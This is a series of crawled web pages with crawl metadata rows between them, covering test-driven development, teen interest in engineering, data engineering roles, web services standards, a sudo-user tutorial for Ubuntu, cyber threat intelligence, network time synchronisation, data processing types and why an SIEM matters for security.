Small functions should have their dedicated tests, which simplifies testing and simplifies the review of cases and code branches.
These are some ideas to take into consideration during the design and development of tests in order to create a logical and robust testing infrastructure for your project. Lastly, if you have any questions around the advantages and design considerations of Test-Driven Development, please don’t hesitate to reach out to us at any time. We’d love to help you get started.
Necessary cookies are absolutely essential for the website to function properly. These cookies ensure basic functionalities and security features of the website, anonymously.
|cookielawinfo-checbox-analytics||11 months||This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".|
|cookielawinfo-checbox-functional||11 months||The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".|
|cookielawinfo-checbox-others||11 months||This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.|
|cookielawinfo-checkbox-necessary||11 months||This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".|
|cookielawinfo-checkbox-performance||11 months||This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".|
Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet. | <urn:uuid:7d461bb0-cae9-4ec8-a813-34c81b2faed6> | CC-MAIN-2022-40 | https://anexinet.com/blog/test-driven-development-tdd-advantages-design-considerations/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00192.warc.gz | en | 0.898047 | 886 | 3.0625 | 3 |
Sergey Nivens - Fotolia
More than 80% of 16 to 17-year-olds are interested in technology, but only 21% are interested in an engineering career, according to research.
A study by the Queen Elizabeth Prize for Engineering (QEPrize) found 82% of 16 to 17-year-olds in the UK think engineering is integral to the future of technology innovation, but less than a quarter want to pursue it as a career.
“We need to do more to educate people on the role engineering plays in technology and help young people understand that technology is a product of engineering,” said Christopher Snowden, chairman of the QEPrize judging panel and vice-chancellor of the University of Southampton.
The research found teens would be more inspired to go into engineering if they could use it as an opportunity to change society. Some 36% of teens said their motivation for going into technology would be to create innovations that would make a difference to the world.
The 16 to 17-year-olds ranked helping society as a greater motivator to entering engineering than income levels or job security.
More than 70% claimed climate change and depleting energy resources would be concerns in the future, and felt engineering would be able to address these issues in the next 20 years.
Breaking down stereotypes
Science, technology, engineering and maths (Stem) subjects still have a reputation for being difficult, putting many potential candidates – especially girls – off entering the sector.
Almost a third of 16 to 17-year-olds claimed they felt a career in engineering would be too hard and they would be unable to gain funding for training.
Industry professionals claim the industry should work with schools and parents to break down these stereotypes and give children a better idea of what a Stem career entails.
Read more about IT skills
- TechUK paper puts forward recommendations to government and industry on closer collaboration to close the IT skills shortfall.
- Jobs in IT and technology are the top career choices for 13-17-year-olds who want to launch their own business.
“Our sector needs to work together to overcome some of the outdated stereotypes and old-fashioned notions that engineering isn’t a career suitable for women,” said Nigel Whitehead, group managing director at BAE Systems.
“We must do more to show all young people – and their parents – that engineering is a great career choice. We need to be bolder about the importance of Stem subjects,” he added.
According to the QEPrize report, UK teenagers show more interest in entering engineering fields (85%) than the global average (81%).
However, although UK teens showed more interest in Stem subjects than those in Germany, Japan and South Korea, they fell behind all other countries.
Skilled IT and Stem workers are in high demand in the UK, with more than 90% of firms claiming they are facing some sort of skills shortage. | <urn:uuid:51d10703-e9e5-4f18-9356-9f486cc0bab3> | CC-MAIN-2022-40 | https://www.computerweekly.com/news/4500278669/Teens-interested-in-tech-but-few-seek-career-in-engineering | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337432.78/warc/CC-MAIN-20221003200326-20221003230326-00192.warc.gz | en | 0.970019 | 611 | 3.34375 | 3 |
Data engineering has never been more important or relevant than it is today. While in the past, many of their responsibilities were often tasked to data scientists, most data scientists are not experts at building data infrastructure and pipelines to complete their work. Because of this, we’ve found that many data scientists prefer to exclude data engineering requirements from their job responsibilities altogether.
This post, which is an excerpt from our newly-released 2021 salary report for the data engineering field (which can be downloaded for free here), shares more about how this field has developed over the past few decades, and some of the criteria that Burtch Works uses to define data engineers.
The Evolution of Data Engineering
Many might say that data engineering as a profession has been around for well over a decade, or even several, since relational databases came to market led by major Original Equipment Manufacturers (OEM’S) in the 1970’s. This included Microsoft SQL Server, IBM DB2, and Oracle. However, the reality is that data engineering has evolved immensely since the early years with the onset of Big Data, digital transformation, and more sophisticated data science practices like machine learning and artificial intelligence.
Now data volumes, variety, and velocity are much greater than what they used to be, which has led data engineering professionals away from using traditional ETL tools to developing and adopting new tools and processes to handle the data revolution. These modern tools and responsibilities now support cloud computing, data infrastructure, data warehousing, data mining, data modeling, data crunching, metadata management, data testing, and governance, among others.
Defining Data Engineers
So how does Burtch Works define data engineers? We define data engineers as professionals who design and build systems for collecting, storing, and analyzing data at scale. They are also typically responsible for building data pipelines to bring together information from different source systems.
Data Engineer Education Profile:
Data engineers typically hold a Bachelor’s or Master’s degree in Computer Science, Information Systems, or Computer Engineering. In the sample from our 2021 salary report data engineering professionals, we found that the most common degree is a Master’s degree (62% of the sample), followed by Bachelor’s degrees (32%), and PhDs were rare (5%). For more about how this compares to data scientists, check out this post.
Data Engineer Tool Usage
Data engineering is a field with many tools, and it’s not uncommon to see a very extensive tool section on a resume or job description. There is no singular tool that makes someone a data engineer, and so we find that most data engineers will have a very broad set of experience with many tools, including many of the examples listed below:
- Programming: Python, PySpark, Scala, Java, SQL, Shell Scripting, or occasionally C++
- Cloud Computing: AWS (Redshift, EMR, EC2, Lambda, S3, etc.), Azure, or GCP (BigQuery)
- Relational Databases: SQL Server, Oracle, MySQL, Teradata
- NoSQL Databases: Cassandra, MongoDB, Neo4j
- Continuous integration/continuous deployment (CI/CD): Docker, Jenkins, Kubernetes
- Big Data technologies: Hadoop, HDFS, Hive, MapReduce, Spark, HBase
- Reporting: Tableau, PowerBI, and Looker
Typical Data Engineer Skills & Job Responsibilities
Data engineers often have a wide range of skills and work alongside data scientists to prepare data for analysis and put data products into production. For more about how data engineer vs. data scientist skills compare, see this post. Below are some examples of typical data engineer skills and responsibilities that we see:
- Building data pipelines and ETL or ELT
- Experience with complex distributed computing
- Ability to work with structured and unstructured data
- Deployment of data science models
- Experience with data science applications
- Experience with continuous integration working with Docker and Kubernetes
- Build and scale large batch data pipelines and real-time ETL pipelines
- Gather business requirements and implement data processes
- Design and support data lakes and data marts
- Work with data scientists to deploy machine learning models
- Troubleshoot models in a production environment to ensure accuracy
Typical Job Titles
There are a variety of different job titles and specializations within data engineering, and we’ve also seen a rise in hybrid-type roles that may lean further towards machine learning or DevOps. Below are just a few examples of data engineering job titles, but to learn more about specializations like BI Engineers, Computer Vision Engineers, or Data Architects, you can read this post.
- Data Engineer
- Big Data Engineer
- Data Science Engineer
- Cloud Engineer
- Cloud Data Engineer
- Principal Data Engineer
- Manager/Director, Data Engineering
- Head of Data Engineering/Architecture
Looking into the future, as we continue to see more hiring and investment allocated to building data teams, the demand for data engineering is poised for significant growth and continued innovation. There is a lot to learn about this growing field, so our hope is that this post can be a good foundational resource to learn more about who these professionals are and what they do.
Interested in our salary research on data engineers and data scientists? Download our studies using the button below. | <urn:uuid:3a4c89a7-0d5d-47b2-8d6c-5f45b1ae1e8b> | CC-MAIN-2022-40 | https://www.burtchworks.com/2021/10/11/rise-of-the-data-engineer-tools-skills-and-the-future-of-big-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338280.51/warc/CC-MAIN-20221007210452-20221008000452-00192.warc.gz | en | 0.935332 | 1,132 | 2.546875 | 3 |
An Eye on the Standards
While developing .Net and related products, Microsoft has scrupulously (for Microsoft, anyway) employed Web standards. Even if you are not planning to embrace .Net, it is important (and perhaps vital) to keep an eye on developments in:
- XML (Extensible Markup Language)
- UDDI (Universal Description, Discovery, and Integration)
- WSDL (Web Services Description Language)
- SOAP (Simple Object Access Protocol)
Some of these protocols have other uses, but for the next several years Web services will dominate much of their use and development. These standards are the reason people feel Web services have a much better chance for success than previous distributed application schemes (e.g., CORBA and DCOM). Adherence to standards will determine just how well Web services components can really interoperate.
Of the four standards, UDDI is a particularly important bellwether because it will be used to create Web services registries (directories). UDDI also specifies how a browser or server can go out on the Internet and locate a desired Web service from the registries. The contents of these registries, how they are reached, and how efficiently they lead to using a Web service will have a lot to do with the success of the Web services concept. | <urn:uuid:c98c2928-87c7-4bcb-bc27-a82234869c21> | CC-MAIN-2022-40 | https://cioupdate.com/navigating-the-waters-of-web-services-with-net/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00393.warc.gz | en | 0.931787 | 271 | 3.03125 | 3 |
You probably have heard of the concept “In Linux, everything is a file”. This sounds somewhat puzzling since the Linux system comprises various entities and not just files. We have directories, symbolic links, processes, pipes, and sockets just to mention a few. The oversimplification simply gives a high-level overview of the Linux architecture. It implies that in a Linux system, every single entity is considered a file. These entities are represented by a file descriptor which is a unique identifier for a file or other resources such as directories, network sockets, or processes – hence the concept “everything is a file”.
This oversimplification then leads us to the concept of file permissions and directories. By default, each file in Linux has its own permissions and directories. These permissions determine access rights or privileges that users have on the file. If you own a file or a directory, you can pretty much do anything you want with it – you can access it, edit it, rename and even delete it.
But not all users are the same. One unique user in the Linux system is the root user. The root user is an administrative user with the highest privileges and is not bound by any permission restrictions. The user can do pretty much anything. This includes installing and uninstalling programs, accessing and modifying system files, and customizing the system. The root user can also break the system, whether intentionally or accidentally – which is why it’s not recommended to log in and run the system as the root user. It only takes one wrong command to crash the system. For this reason, it’s always recommended to run commands as a sudo user.
What is a sudo user?
Since administering the Linux system as the root user is highly discouraged, a system administrator needs to grant a regular user some level of privilege to execute some (or all) root commands.
Sudo is a program that grants regular users permissions to run commands with root privileges or as another user. A sudo user is, therefore, a regular Linux user with elevated privileges to run commands as a root user or another regular user, the default being the root user. In addition, you can configure sudo to restrict a sudo user to a handful of commands or allow them to run all commands as the root user. We will cover these scenarios in depth later on in this guide.
First, we will walk you through the creation of a sudo user on Ubuntu 20.04.
How to create a sudo user
To create a sudo user on Ubuntu 20.04, follow the steps outlined.
Step 1: Log in to your server
First, log in to your cloud server as the root user using the syntax shown.
$ ssh [email protected]
Provide the root password when prompted and hit ENTER to gain access to the server. If you are using Putty, simply type in the IP address of the remote server and click the ‘Open’ button, or hit ENTER.
Step 2: Create a new user
Once logged in, create a new regular user using the
adduser command. Here,
jumpcloud is our new user.
# adduser jumpcloud
The command does a couple of things. First, It creates a new user and primary group called
jumpcloud, and then adds the user to the group. Next, a home directory for the user is created and configuration files are copied into it. Thereafter, you will be prompted to type in the new user’s password. Be sure to provide a strong password and confirm it.
Once the user’s password is set, some additional information will be required of you. Fill in where necessary or leave it blank by hitting ENTER if the information is not applicable.
To confirm that the newly added user was created, view the
/etc/passwd file using the cat command. This provides information such as the UID (User ID), GID (Group ID), and the path to the home directory.
# cat /etc/passwd | grep jumpcloud
Similarly, you can retrieve the user details using the
# id jumpcloud
Step 3: Add the new user to the sudo group
A sudo group is a group of superusers that have privileged access to root commands. With that in mind, proceed and add the new user to the sudo group using the
usermod command as follows.
# usermod -aG sudo jumpcloud
To verify that the user has been added to the
sudo group, use the
# id jumpcloud
From the output, we can see that the user now belongs to two groups:
sudo. Alternatively, you can also run the
groups command to only display the groups that the user belongs to.
# groups jumpcloud
Perfect! The new user is now a sudo user and has unrestricted access to root privileges.
Step 4: Test sudo
With the sudo user already in place, we are going to proceed and test the user. So, switch to the sudo user using the su command.
# su - jumpcloud
The command places you in the user’s home directory path.The syntax for using sudo is indicated below
$ sudo command-to-be-executed
As an example, we are going to update the package lists of our system. So, invoke sudo followed by the command to be executed.
$ sudo apt update
When prompted, type in the password of the user and hit ENTER. The command will execute successfully – a confirmation that the user has successfully been added to the sudo group and can now perform elevated system tasks.
Understanding the sudoers file
The sudo user that we have created assumes all the rights and privileges of the root user and can run virtually any command. However, good practice recommends that you employ the least privilege principle. This is a security concept whereby a user is only assigned minimum access rights or permissions to perform their role. Therefore, as a systems administrator, you should only grant the necessary permissions to the sudo user to allow them to perform their roles.
The sudoers file
/etc/sudoers is a file that spells out which users can run what commands on the system. It comprises a set of rules that govern which users or groups can run elevated tasks. To grant or restrict root privileges to users, you need to edit this file.
You should never edit the sudoers file using a normal text editor like nano or vim as this could lead to a corrupted file which can potentially lock everyone out including the admin. As such, the sudoers file should be accessed by executing the command
visudo as follows.
This opens the
/etc/sudoers file using the nano editor as shown. All lines starting with a hash sign – # – are comments and do not have any effect or impact on the file.
By default, the file has 6 uncommented lines. Let’s skip to the user privilege line which is the fourth line.
root ALL=(ALL:ALL) ALL
- The first parameter points to the username – in this case root user.
- The first “ALL” indicates that the rule is applicable to all hosts.
- The second “ALL” indicates that the root user can execute all commands as all users.
- The third “ALL” shows that the root user can execute all commands as all the user groups.
- Finally, the last “ALL” indicates that the rules are applicable to all commands.
The next two lines define the sudo rules for groups. The “%” defines a group. Here, we have two groups that have been defined: admin and sudo groups.
The second line indicates that the admin group can run all commands as any user.
%admin ALL=(ALL) ALL
The third line indicates that the sudo user can run any command as any user and as any group.
%sudo ALL=(ALL:ALL) ALL
Editing the sudoers file directly is not recommended. Instead, it is preferred to place the associated sudo rules in the
/etc/sudoers.d directory. This makes it easy for sysadmins to keep track of which rules apply to which user accounts. Files placed in this directory will follow the same rules as the sudoers file.
How to restrict sudo users from executing certain commands
As we pointed out earlier, you might need to limit sudo users from running certain system commands. To accomplish this, you need to create a sudo rule in the
For demonstration, we will create a rule called
jumpcloud which restricts the sudo user from upgrading the packages to their latest versions.
# vim /etc/sudoers.d/jumpcloud
Next, copy and paste the line shown and save the changes.
The rule indicates that the
jumpcloud user can execute all commands as the root user with the exception of the
apt upgrade command. Note that you need to provide the full path of the command prefixed by an exclamation mark.
To find the full path of a command, use the
which command syntax as shown.
$ which command
When the user tries to upgrade the packages, an error is splashed on the screen indicating that the user is not allowed to do so.
Where multiple commands are involved, list them in a single line separated by a comma. In the example below, the sudo user has been limited from shutting down and rebooting the system. Notably, there are multiple ways of shutting down or rebooting a Linux system, and the associated commands have been listed in a single line below.
Any attempt to power off or reboot the system by the user will be thwarted by the system.
How to run specific sudo commands without a password
Sometimes, you might need to run some commands without being prompted for a password. This is particularly helpful if you are running a script containing a sudo command.
To achieve this, use the directive NOPASSWD followed by the full path to the command. In the example below, the user can update the package lists without a password prompt.
jumpcloud ALL=(ALL) NOPASSWD: /usr/bin/apt update
Managing user privileges is usually one of the top-of-mind tasks that every system administrator has to undertake. Sudo privileges should only be granted to trusted users such as support or operation teams.
It’s always recommended to restrict sudo users to a subset of system commands. By doing so, you provide them with the basic privileges that they need to perform their roles. Unrestricted sudo access can be detrimental as this can lead to the sudo user performing some unauthorized operations which can wreak havoc on the system. Or worse, unrestricted sudo access privileges can make it that much easier for a malicious actor to take over the system.
That being said, managing the process to assign specific permissions to specific users can be overly time consuming and quickly overwhelm your priorities, especially if you are facing a growing environment and a growing team. JumpCloud’s Linux device management capabilities make it easier to manage sudo access across entire fleets through its user security settings and permissions. To see how this works, along with a number of other device security and management features, sign up for your free account today. JumpCloud is free to use for up to 10 users and 10 devices; we also provide 24×7 in-app support for the first 10 days of use. | <urn:uuid:b68319e1-0087-4a79-8ba3-0d4842db7af6> | CC-MAIN-2022-40 | https://jumpcloud.com/blog/how-to-create-a-new-sudo-user-manage-sudo-access-on-ubuntu-20-04 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030331677.90/warc/CC-MAIN-20220924151538-20220924181538-00393.warc.gz | en | 0.922719 | 2,434 | 3.671875 | 4 |
Cyber threat intelligence is data that’s collected, processed and analysed to understand security risks.
The information can be used to determine threat actors’ motives, the information they might target and the actions they might take.
It’s a crucial weapon in organisations’ cyber defences, as it helps them respond to threats proactively. They can make informed decisions based on research and evidence, and implement measures to mitigate cyber security risks.
Why is cyber threat intelligence important?
One of the crucial elements of effective cyber security is speed. Cyber criminals are always looking for ways to identify and exploit vulnerabilities, and organisations must react quickly to close known weaknesses and spot errors before the crooks can pounce.
Cyber threat intelligence gives organisations an advantage over criminals in this conflict. The information they gather can help them anticipate threat actors’ moves and implement appropriate precautions.
The data gathered during intelligence finding can also reveal trends in cyber criminals’ techniques and tactics. This can help cyber security personnel prepare for future attacks and shift resources accordingly.
But cyber threat intelligence doesn’t only help security personnel understand what threat actors do; the information also provides insight into their decision-making process.
The benefits of cyber threat intelligence
Although cyber threat intelligence is often associated with large firms that have significant cyber security budgets, the system can help organisations of all sizes.
After all, every organisation is at risk of security incidents and would benefit from cyber security support.
For SMEs, cyber threat intelligence can help decision-makers prioritise their resources. Instead of relying on technologies, tools and processes that are applied based on general guidance, organisations can determine which defences are best suited for their needs.
Meanwhile, larger organisations can use cyber threat intelligence to support their existing security mechanisms. By leveraging external threat intelligence, they will reduce the need for additional internal security analysts.
Cyber threat intelligence lifecycle
The threat intelligence lifecycle is a process that transforms raw data into clear information that can be used to make decisions. It can take several forms, but it generally consists of six steps that are repeated to form a continual improvement process.
1. Determine your requirements
An organisation’s first task is to agree upon the goals of the cyber threat intelligence system. Your team might want to learn about the types of attackers that target your organisation, their motivation, the attack surface and the specific actions that should be taken to mitigate the risk.
Once these have been established, the organisation should create a methodology for implementing the system based on their available resources.
2. Collect the required information
The next step is to collect the necessary data to meet your requirements. This could mean gaining information from traffic logs, publicly available data sources, relevant forums and subject matter experts.
3. Process the information
After the data has been collected, it must be processed into a format suitable for analysis.
This usually means decrypting files, translating information from foreign sources, organising the data points in spreadsheets and evaluating the data for relevance and reliability.
4. Analyse the information
Once the dataset has been processed, the organisation must analyse the information to find answers to the questions posed in the requirements stage.
5. Present the results
The threat intelligence team must translate their analysis into a summary of findings. This is so that they can share their conclusions with senior decision-makers without relying on dense statistics or technical jargon.
6. Seek feedback
The final stage of the threat intelligence lifecycle is to receive feedback on the data that has been provided.
You might learn, for example, that the organisation has made organisational changes regarding cyber security, which will affect the way threat intelligence should be gathered, or that senior decision makers would prefer reports to be presented in a different way.
Preparing for cyber security incidents with GRCI Law
If you’re looking for guidance on how to prevent cyber security incidents, GRCI Law is here to help.
Our Cyber Incident Response Readiness Assessment provides an impartial review of your organisation’s ability to protect against, detect and respond to a cyber security incident.
The assessment looks at your organisation’s cyber incident response capabilities, threat and vulnerability management, event logging and monitoring, and business continuity.
We understand that no two organisations are the same and our consultancy team will work with you to ensure that we provide advice that is relevant to your organisation’s size, sector and objectives. | <urn:uuid:bffcf471-cc45-43f3-9ba7-fd6b4edf0ac9> | CC-MAIN-2022-40 | https://www.grcilaw.com/blog/what-is-cyber-threat-intelligence | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00393.warc.gz | en | 0.927133 | 906 | 2.859375 | 3 |
Network time-synchronization products from Symmetricom and Napatech keep time straight across Ethernet and Internet Protocol networks.
Coordinating accurate time across a network has always been a challenge. By the time it takes a data packet with the current time to go from a time server to a client requesting the time, hundreds of milliseconds may have elapsed.
Compounding the problem is that the packet may or may not experience queuing delays of indeterminate lengths as it moves across the switches, routers and other gear in between the source and the destination.
The good news is that for most cases, the Network Time Protocol (NTP) can be used to keep time straight, thanks to various offset mechanisms built into the standard that take network jitter and delay into account. However, in some cases, really exact time measurement is needed, down to the sub-millisecond. For these duties, system builders should look at the Institute of Electrical and Electronics Engineers' IEEE 1588 precision clock synchronization protocol.
"NTP can exchange time stamps about once every 16 seconds, which means the accuracy which we typically derive [from NTP] is about a millisecond," said Paul Skoog, product marketing manager at the Timing, Test and Measurement Division of Symmetricom. "If you have to have to have better than a millisecond, that's when we start talking 1588."
A company that specializes in network time-synchronization products, Symmetricom offers a range of hardware that works with 1588, including dedicated time servers and switches that can maintain the integrity of time packets.
Most recently, the company has released version 4.0 of TimePictra, a package of hardware components that can synchronize time across an Ethernet or Internet Protocol network, using IEEE 1588. With this package, a node manager maintains the correct time, which it communicates with remote clients at the edges of the networks on regular intervals. The company has also released the latest version of its Grandmaster Clock, which features a dedicated 1588 time stamp processor.
The labs of Hewlett-Packard Co., originated IEEE 15888 as a way of synchronizing test and measurement equipment over a network, Stoog said. The chief difference between IEEE 1588 and NTP is that with NTP, the time is generated and adjusted is all in software, while IEEE 1588 uses the underlying hardware as a reference, meaning the time is based off the frequency oscillations of the underlying circuitry. This approach allows time to be measured in about 60 nanosecond intervals (a nanosecond is 0.000001 Milliseconds).
Symmetricom has a number of white papers that explain the internal workings of 1588 in more detail. To download them, visit this page.
Although NTP can handle most synchronization needs in government, there are a number of cases where more exact measurement does come in handy. Military sensor networks, for instance. A testing range may want to carefully document how some explosives detonate, or how quickly an aircraft moves. A testing range could be instrumented with hundreds of sensors to capture data from tests. Coordinating the resulting data would require extremely precise measurement. GPS devices could also provide sub-millisecond accuracy, but pairing GPS devices to each sensor would be prohibitively expensive.
Telecommunication companies are the biggest buyers of the 1588 protocols products. As telcos move to Internet Protocol networks, they lose the built-in time synchronization of circuit networks. A base station cell tower, for instance, may be directly connected to an Ethernet network, rather than to a T-1 line, and would require timing. Using 1588-based synchronization platforms keeps the telco's networks all on the same clock.
Symmetricom is not alone in releasing new 1588 products. Napatech has updated its round of 1 Gigabit and 10 Gb Ethernet adapters to be synchronized via 1588. Napatech is pitching these adapters for use in network performance monitoring, test and measurement, and traffic optimization.
NEXT STORY: Safe and sound in the cloud | <urn:uuid:a8ca35e6-08e0-430e-a57e-4a6faa35a637> | CC-MAIN-2022-40 | https://gcn.com/cloud-infrastructure/2009/09/when-nanoseconds-matter-these-products-can-help/300415/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335257.60/warc/CC-MAIN-20220928145118-20220928175118-00393.warc.gz | en | 0.934256 | 834 | 2.515625 | 3 |
- 1 What is Data Processing?
- 2 Stages of the Data Processing Cycle
- 3 7 Types of Data Processing based on What needs to be captured
- 4 Conclusion
What is Data Processing?
Data Processing refers to converting raw data into meaningful information, and these data are machine-readable as well. Thus, data processing involves collecting, Recording, Organizing, Storing, and adapting or altering to convert the raw data into useful information.
Stages of the Data Processing Cycle
The data processing cycle consists of steps to convert your raw data into actionable and meaningful information. Generally, Data Processing Cycle consists of the following SIX stages.
- Data collection
- Data preparation
- Data input
- Data Processing
- Data output
- Data storage
7 Types of Data Processing based on What needs to be captured
Types of Data processing have phenomenally grown with rising demands from manual data processing to automation.
Let’s dive into the SEVEN types of data processing techniques that depend on the information that needs to be captured and how soon you need it.
- Manual Data Processing
- Mechanical Data Processing
- Electronic Data Processing
- Batch Data Processing
- Real-time Data Processing
- Online Data Processing
- Automatic Data Processing
1. Manual Data Processing
The Manual Data processing method is where data entry specialists record and process data manually through the ledger, paper record systems, and more manual data entry process. Though it is one of the earliest data processing methods, manual data entry is costly, time-consuming, error-prone, and labor-intensive.
For instance, imagine a company where employee entry is permitted only by signing a ledger instead of today’s access cards.
2. Mechanical Data Processing
Mechanical data processing processes data through mechanical devices such as typewriters, mechanical printers, and other devices. Albeit being faster than the manual data processing method, it started to fade away with the future evolutions.
3. Electronic Data Processing
In 1980, with the birth of computers, electronic data processing (EDP) marked its existence. In EDP, the computer seamlessly processes the data automatically with pre-defined instructions from the data specialists.
For instance, the use of spreadsheets to record student marks was prevalent during this time.
Though this data processing method is accurate, reliable, and faster than its predecessor, it still required data specialists for manual data entry and calculations.
4. Batch Data Processing
Batch data processing, process data by providing actions to multiple data sets through a single command. For example, in spreadsheets, data entry specialists can enter the formula for a single cell and apply it for the whole column. This type of data processing accelerates the processing time and can complete a series of tasks without human intervention.
5. Real-time Data Processing
Real-time processing came into existence with the advent of the internet. By utilizing the internet, this processing method receives and processes data at the same time. Simply put, it captures data in real-time and generates quick or automatic reports. Hence this is one of the fastest data processing methods.
For example, take GPS tracking systems where sensors detect heavy traffic and give input on a real-time basis. Though the process saves time and labor, it is expensive and requires heavy maintenance.
6. Online Data Processing
Online data processing is often confused with real-time data processing; both receive and process data simultaneously, but with online processing, the user can extract data anytime, anywhere. The bar code system is the best example of online processing. When buying a book in a bookstore, with the bar code scanning, the book’s data is automatically changed as sold. Another concrete example is access cards.
7. Automatic Data Processing
Today’s millennials are entering the new age of data processing with the entry of Artificial Intelligence. Data processing cannot be made better, with no human intervention, data entry on a real-time basis, error-free, and secure than any processing methods.
To illustrate this type of data processing, consider the automation of billions and billions of invoices in the logistics sector. It not only reduces the grunt work but also helps to focus on great work.
From the above overview of data processing methods, it is no surprise organizations find automatic data processing as the best fit. But not all organizations have joined the AI bandwagon!
Now is always the best time to act!
With a proven track record of delivering personalized services, iTech, as a data outsourcing partner with a constant focus on innovation, has added automation services to its arsenal to aid the customers in today’s digital arena.
Our automation services include SAP robot process automation, OCR/ICR services, ML-based data entry services, and more. Let us e-meet to talk more.
Reach out to our team today! | <urn:uuid:1d680e8e-6898-48da-abf6-4f7be5cffe09> | CC-MAIN-2022-40 | https://itechdata.ai/types-of-data-processing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337446.8/warc/CC-MAIN-20221003231906-20221004021906-00393.warc.gz | en | 0.898731 | 1,060 | 3.53125 | 4 |
An SIEM is critical to your Cybersecurity planning. Why? It turns out there are many ways to secure an organization’s network, but can you depend on any of them to be 100% reliable? The answer is no. Zero-Day exploits, File-less malware, Phishing, Social Engineering, Brute Force Attacks, lost or stolen mobile devices...all of these can be the one opportunity that a cyber-hacker needs to gain access to your network, exfiltrate your most sensitive data, and hold your business Ransom for hundreds of thousands, if not millions of dollars.
But how can you know where the attack will come from, the multiple resources that are being attacked, and how to defend against the attack? It turns out that CyberSecurity, just like ogres and onions, has layers. More accurately, Cybersecurity has a framework which, when used properly, can help to defend organizations from a Cybersecurity attack. The reason for the framework is so that if one of the elements fails, the organization has additional systems ready to help defend the organization.
Physical Security As A Model For Cybersecurity
If you were looking to secure your physical office space, you would most certainly first focus on putting keyed locks on the doors. You might also add deadbolts that use a different key, or keycard security, or maybe even a digital keypad with an access code. But doors are not the only way into your building, so you’d probably want bars on the windows and reinforced glass. And just in case anyone were to get through that security, you would of course want an alarm system so that you’re notified of the intrusion. Is that enough? Probably not, and so you’d want to install video surveillance both inside and outside your building so you can see who is trying to get in...or who might have already gained access.
You protect the doors and windows because those are ways people might get in. You add an alarm system to notify you if there’s a breach, and you have video surveillance so you can see what actually happened. Each of these layers of security plays its own role in protecting your physical business. And layers of Cybersecurity help to protect your network, your data, and your entire business.
NIST Cybersecurity Framework
The most common Cybersecurity framework was developed by the NIST (National Institute of Standards and Technology), a department of the Federal Government, and contains five different layers to help organizations protect themselves from cyber attacks. Those layers are:
- Identify -- Know what it is you are protecting, the assets you have available, and the risks you face.
- Protect -- Security, Access Control, Protection and Education to keep your business safe.
- Detect -- Monitor everything, know what’s normal and what’s not normal.
- Respond -- How to figure out what happened, how to reduce the damage.
- Recover -- Recovering from the breach, improving your systems for next time, and communicating with interested parties.
Of course, this is a greatly simplified view. The NIST cybersecurity framework actually has 108 subcategories of recommended activities. The problem is that many businesses focus on the Protection activities to the exclusion of most of the others. That is why they will install strong password policies, strong antivirus, end-point protection, sandboxing of all web links, firewalls to block entry to the network, and VPNs to make communicating from or to the outside more secure.
Those are all good and necessary parts of a Cybersecurity strategy, but they aren’t enough on their own. Just as an organization needs alarms and video surveillance, an SIEM is critical to an organization’s Cybersecurity plan.
Why an SIEM is Critical To Your Cybersecurity Framework
Detection is a critical activity of any Cybersecurity strategy, which is why every quality Protection strategy is going to also provide strong, secure and detailed logging of all activities.
- Workstations will keep logs of every time a user logs in or runs an application.
- Networks will monitor and log all traffic that runs across it, including each file accessed and message exchanged.
- Firewalls will keep logs of all traffic going through its systems and attacks it has defended against.
- Virtual Private Networks (VPNs), which are designed to secure traffic from one endpoint to another, will similarly keep track of logins and traffic.
...and so on for all of your quality IT infrastructure systems.
Logging is critical for detection activities, but the problem with all of these logs is that they are all separate and independent logs...and they are HUGE if they are doing their job. They are individual silos of data that on their own cannot tell you all that you need to know. But if they are monitored and mined properly, they can reveal critical insights and information about the health of a network, the attacks that are attempting to breach it, whether they were successful or not, and the damage they might have done.
An SIEM is critical because it correlates the data from all of your logging activities in order to provide real information about the health and activities of your network and its security.
The vast majority of the data contained in your logs are going to be for legitimate traffic and activities. The most dangerous and threatening activities are going to be few and far between. But they will leave a trail...think of them as dots along a path...that the SIEM will link together to paint you a picture of what’s going on in your network.
An Illustrated SIEM Example
So how can an SIEM be critical to your organization’s Cybersecurity in real terms? Imagine for a moment that Bob is on a business trip to New York. He logs into the network via his VPN access minutes before his big presentation. Moments before, he logged in from someone else’s workstation within the facility. Worse yet, he is at the same time downloading intellectual property data from the branch office in Houston.
None of those activities on their own might be flagged as malicious, but an SIEM would coordinate and contextualize all of this logged data from the VPN, the internal network, the HR system and other systems and conclude that there is an access problem and that an attack is underway.
If You Don’t Have An SIEM Yet, You Need To
